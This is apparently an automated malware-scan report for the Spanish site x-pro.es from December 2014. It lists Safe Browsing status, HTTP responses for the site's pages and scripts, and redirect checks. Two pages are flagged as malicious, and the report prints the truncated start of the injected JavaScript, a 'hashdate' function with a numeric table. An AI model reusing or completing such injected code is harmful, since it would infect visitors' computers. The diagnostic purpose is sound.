Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=x-pro.es
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://x-pro.es/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:12 GMT Location: http://www.x-pro.es/ Server: Apache Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.x-pro.es/ | 200 OK Content-Length: 32341 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,3 Antivirus reports: | ||
http://www.x-pro.es/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://x-pro.es/media/system/js/core.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:13 GMT Location: http://www.x-pro.es/media/system/js/core.js Server: Apache Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.x-pro.es/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://x-pro.es/media/system/js/caption.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:14 GMT Location: http://www.x-pro.es/media/system/js/caption.js Server: Apache Content-Length: 254 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.x-pro.es/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://www.x-pro.es/modules/mod_slideshowck/assets/jquery.min.js | 200 OK Content-Length: 93888 Content-Type: application/javascript | clean |
http://www.x-pro.es/modules/mod_slideshowck/assets/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://www.x-pro.es/modules/mod_slideshowck/assets/jquery.mobile.customized.min.js | 200 OK Content-Length: 17519 Content-Type: application/javascript | clean |
http://www.x-pro.es/modules/mod_slideshowck/assets/camera.min.js | 200 OK Content-Length: 39398 Content-Type: application/javascript | clean |
http://www.x-pro.es/modules/mod_swmenufree/fix_wmode2transparent_swf.js | 200 OK Content-Length: 2375 Content-Type: application/javascript | clean |
http://www.x-pro.es/modules/mod_swmenufree/jquery.corner.js | 200 OK Content-Length: 11267 Content-Type: application/javascript | clean |
http://www.x-pro.es/modules/mod_swmenufree/DropDownMenuX_Packed.js | 200 OK Content-Length: 12677 Content-Type: application/javascript | clean |
http://x-pro.es/templates/x-pro/ie_suckerfish.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:18 GMT Location: http://www.x-pro.es/templates/x-pro/ie_suckerfish.js Server: Apache Content-Length: 260 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.x-pro.es/templates/x-pro/ie_suckerfish.js | 200 OK Content-Length: 383 Content-Type: application/javascript | clean |
http://x-pro.es/index.php/galeria | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:18 GMT Location: http://www.x-pro.es/index.php/galeria Server: Apache Content-Length: 245 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.x-pro.es/index.php/galeria | 200 OK Content-Length: 97902 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function hashdate (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,3 Antivirus reports: | ||
https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js | 200 OK Content-Length: 95786 Content-Type: text/javascript | clean |
http://x-pro.es/plugins/content/jw_sigpro/jw_sigpro/includes/js/jquery_fancybox/fancybox/lib/jquery.mousewheel-3.0.6.pack.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 00:52:23 GMT Location: http://www.x-pro.es/plugins/content/jw_sigpro/jw_sigpro/includes/js/jquery_fancybox/fancybox/lib/jquery.mousewheel-3.0.6.pack.js Server: Apache Content-Length: 336 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.x-pro.es/plugins/content/jw_sigpro/jw_sigpro/includes/js/jquery_fancybox/fancybox/lib/jquery.mousewheel-3.0.6.pack.js | 200 OK Content-Length: 1384 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: x-pro.es
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 00:52:12 GMT
Location: http://www.x-pro.es/
Server: Apache
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1
...228 bytes of data.
GET / HTTP/1.1
Host: x-pro.es
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 00:52:12 GMT
Location: http://www.x-pro.es/
Server: Apache
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1
...228 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: x-pro.es
Referer: http://www.google.com/search?q=x-pro.es
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: x-pro.es
Referer: http://www.google.com/search?q=x-pro.es
Result:
The result is similar to the first query. There are no suspicious redirects found.